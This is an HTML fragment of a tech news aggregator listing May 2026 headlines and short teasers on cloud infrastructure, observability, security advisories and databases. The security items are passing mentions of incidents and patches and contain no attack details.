          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-cloudwatch-logs-announces-increased-query-result-limits"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon CloudWatch Logs now supports retrieving up to 100,000 results using the Logs Insights query language. Customers can specify the limit in their query using the LIMIT command. Previously, custome</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/cloudwatch-logs-query-results/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-simplify-cross-account-and-cross-region-stack-output-references-with-aws-cloudformation-and-cdks-new-fngetstackoutput" class="group relative scroll-mt-24">
        <a href="#h3-simplify-cross-account-and-cross-region-stack-output-references-with-aws-cloudformation-and-cdks-new-fngetstackoutput" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Simplify cross-account and cross-Region stack output references with AWS CloudFormation and CDK’s new Fn::GetStackOutput
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-simplify-cross-account-and-cross-region-stack-output-references-with-aws-cloudformation-and-cdks-new-fngetstackoutput"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS CloudFormation makes it easy to model and provision your cloud application infrastructure as code. CloudFormation templates can be written directly in JSON or YAML, or they can be generated by too</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/simplify-cross-account-and-cross-region-stack-output-references-with-aws-cloudformation-and-cdks-new-fngetstackoutput/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-building-ai-agents-has-changed-in-2026" class="group relative scroll-mt-24">
        <a href="#h3-how-building-ai-agents-has-changed-in-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Building AI Agents Has Changed in 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-building-ai-agents-has-changed-in-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Twelve months ago, building an AI agent meant picking a framework, defining your tools, standing up a RAG pipeline, and writing a stack of glue code to wire it all together. That was the default playb</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/how-building-ai-agents-has-changed/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-inside-the-llm-call-genai-observability-with-opentelemetry" class="group relative scroll-mt-24">
        <a href="#h3-inside-the-llm-call-genai-observability-with-opentelemetry" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Inside the LLM Call: GenAI Observability with OpenTelemetry
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-inside-the-llm-call-genai-observability-with-opentelemetry"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Your AI agent just took 45 seconds to answer a simple question. Was it the model? A slow tool call? A retry loop? Every time an application calls an LLM, a chain of model calls, tool invocations, and </p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/genai-observability/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-ways-to-agentically-build-and-edit-dashboards" class="group relative scroll-mt-24">
        <a href="#h3-new-ways-to-agentically-build-and-edit-dashboards" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New ways to agentically build and edit dashboards
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-new-ways-to-agentically-build-and-edit-dashboards"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Create and edit Sentry dashboards with AI agents, the Sentry CLI, or pre-built templates you can clone and customize for your monitoring needs.</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/dashboard-updates/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-assisted-testing-extensions-updates-and-more-k6-20-is-here" class="group relative scroll-mt-24">
        <a href="#h3-ai-assisted-testing-extensions-updates-and-more-k6-20-is-here" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI-assisted testing, extensions updates, and more: k6 2.0 is here
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-assisted-testing-extensions-updates-and-more-k6-20-is-here"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>For years, teams have relied on k6 to take a more proactive approach to performance testing, ensuring they can catch issues early and deliver more reliable user experiences. That approach has helped m</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Grafana Blog</strong></p>
<p><a href="https://grafana.com/blog/k6-2-0-release/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-otel-blueprints-and-reference-implementations" class="group relative scroll-mt-24">
        <a href="#h3-introducing-otel-blueprints-and-reference-implementations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing OTel Blueprints and Reference Implementations
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-otel-blueprints-and-reference-implementations"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>It’s not uncommon for end users adopting OpenTelemetry to, at some point in their journey, ask themselves: “Why is this stuff so complex?”. Full adoption normally requires understanding the different </p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/blueprints-intro/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-finding-the-blind-spot-how-canonical-hunts-logic-flaws-with-ai" class="group relative scroll-mt-24">
        <a href="#h3-finding-the-blind-spot-how-canonical-hunts-logic-flaws-with-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Finding the blind spot: How Canonical hunts logic flaws with AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-finding-the-blind-spot-how-canonical-hunts-logic-flaws-with-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI is accelerating and improving how security engineers find and fix vulnerabilities. A new tool developed and used at Canonical, called Redhound, has already uncovered three critical logic vunerabili</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/finding-the-blind-spot-how-canonical-hunts-logic-flaws-with-ai"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-malicious-node-ipc-versions-published-to-npm-in-suspected-maintainer-account-compromise" class="group relative scroll-mt-24">
        <a href="#h3-malicious-node-ipc-versions-published-to-npm-in-suspected-maintainer-account-compromise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Malicious node-ipc versions published to npm in suspected maintainer account compromise
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-malicious-node-ipc-versions-published-to-npm-in-suspected-maintainer-account-compromise"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>On May 14, 2026, multiple malicious versions of the popular npm package node-ipc were published to the npm registry. Current public reporting identifies node...</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/malicious-node-ipc-versions-published-npm/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cloudnativepg-1291-and-1283-released-critical-cve-fix" class="group relative scroll-mt-24">
        <a href="#h3-cloudnativepg-1291-and-1283-released-critical-cve-fix" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 CloudNativePG 1.29.1 and 1.28.3 released: critical CVE fix
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-cloudnativepg-1291-and-1283-released-critical-cve-fix"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The CloudNativePG community is releasing maintenance updates for all currently supported series: 1.29.1 and 1.28.3. This is a high-priority release. It addresses CVE-2026-44477 (the first CVE official</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/cloudnativepg-1291-and-1283-released-critical-cve-fix-3296/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fragnesia-linux-kernel-local-privilege-escalation-vulnerability-mitigations" class="group relative scroll-mt-24">
        <a href="#h3-fragnesia-linux-kernel-local-privilege-escalation-vulnerability-mitigations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fragnesia Linux kernel local privilege escalation vulnerability mitigations
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-fragnesia-linux-kernel-local-privilege-escalation-vulnerability-mitigations"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A local privilege escalation (LPE) vulnerability affecting the Linux kernel has been publicly disclosed on May 13, 2026. The vulnerability does not have a CVE ID published, but is referred to as “Frag</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/fragnesia-linux-vulnerability-fixes-available"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-postgresql-184-1710-1614-1518-and-1423-released" class="group relative scroll-mt-24">
        <a href="#h3-postgresql-184-1710-1614-1518-and-1423-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 Released!
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-postgresql-184-1710-1614-1518-and-1423-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The PostgreSQL Global Development Group has released an update to all supported versions of PostgreSQL, including 18.4, 17.10, 16.14, 15.18, and 14.23. This release fixes 11 security vulnerabilities a</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/postgresql-184-1710-1614-1518-and-1423-released-3297/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-enterprise-ai-delivering-models-as-a-service-with-red-hat-openshift-ai-34" class="group relative scroll-mt-24">
        <a href="#h3-scaling-enterprise-ai-delivering-models-as-a-service-with-red-hat-openshift-ai-34" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling enterprise AI: Delivering Models-as-a-Service with Red Hat OpenShift AI 3.4
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scaling-enterprise-ai-delivering-models-as-a-service-with-red-hat-openshift-ai-34"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Discover how Red Hat OpenShift AI 3.4 and Red Hat Connectivity Link deliver Models-as-a-Service (MaaS) to centrally govern and scale enterprise AI model serving.Many enterprises have moved past the AI</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/scaling-enterprise-ai-delivering-models-service-openshift-ai-34"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-rethinking-byod-security-protecting-data-without-trusting-devices" class="group relative scroll-mt-24">
        <a href="#h3-rethinking-byod-security-protecting-data-without-trusting-devices" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Rethinking BYOD security: protecting data without trusting devices
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-rethinking-byod-security-protecting-data-without-trusting-devices"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>BYOD (bring your own device) has always looked better on paper than it does in real life. The promise is clear: let people use the gadgets they already own. Less friction, lower costs, and more freedo</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/rethinking-byod-security-protecting-data-without-trusting-devices"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-5-ways-to-fix-misleading-vulnerability-severities-with-policy" class="group relative scroll-mt-24">
        <a href="#h3-5-ways-to-fix-misleading-vulnerability-severities-with-policy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 5 ways to fix misleading vulnerability severities with policy
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-5-ways-to-fix-misleading-vulnerability-severities-with-policy"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A typical enterprise vulnerability report surfaces hundreds of findings per scan cycle, all ranked by the Common Vulnerability Scoring System (CVSS). The problem: CVSS describes the theoretical charac</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/severity-override-vulnerability-management-policy/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-blog-introducing-prempti-falco-meets-ai-coding-agents" class="group relative scroll-mt-24">
        <a href="#h3-blog-introducing-prempti-falco-meets-ai-coding-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Blog: Introducing Prempti: Falco meets AI coding agents
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-blog-introducing-prempti-falco-meets-ai-coding-agents"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today&#39;s developer workflow is increasingly reliant on AI coding agents. Tools like Claude Code sit in your terminal, read your files, run shell commands, make network requests, and write code, all on </p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Falco Blog</strong></p>
<p><a href="https://falco.org/blog/introducing-prempti/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fighting-tool-sprawl-the-case-for-ai-tool-registries" class="group relative scroll-mt-24">
        <a href="#h3-fighting-tool-sprawl-the-case-for-ai-tool-registries" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fighting Tool Sprawl: The Case for AI Tool Registries
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-fighting-tool-sprawl-the-case-for-ai-tool-registries"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As enterprise AI agent adoption scales, the absence of centralized, organization-level tool infrastructure is producing compounding costs. When adoption is built around optimizing for deployment speed</p>
<p><strong>📅 May 11, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/technical/fighting-tool-sprawl-case-for-ai-tool-registries"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-databases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-one-agent-one-sandbox-one-database-inside-the-kimi-k26-architecture" class="group relative scroll-mt-24">
        <a href="#h3-one-agent-one-sandbox-one-database-inside-the-kimi-k26-architecture" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 One Agent, One Sandbox, One Database: Inside the Kimi K2.6 Architecture
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-one-agent-one-sandbox-one-database-inside-the-kimi-k26-architecture"
        >
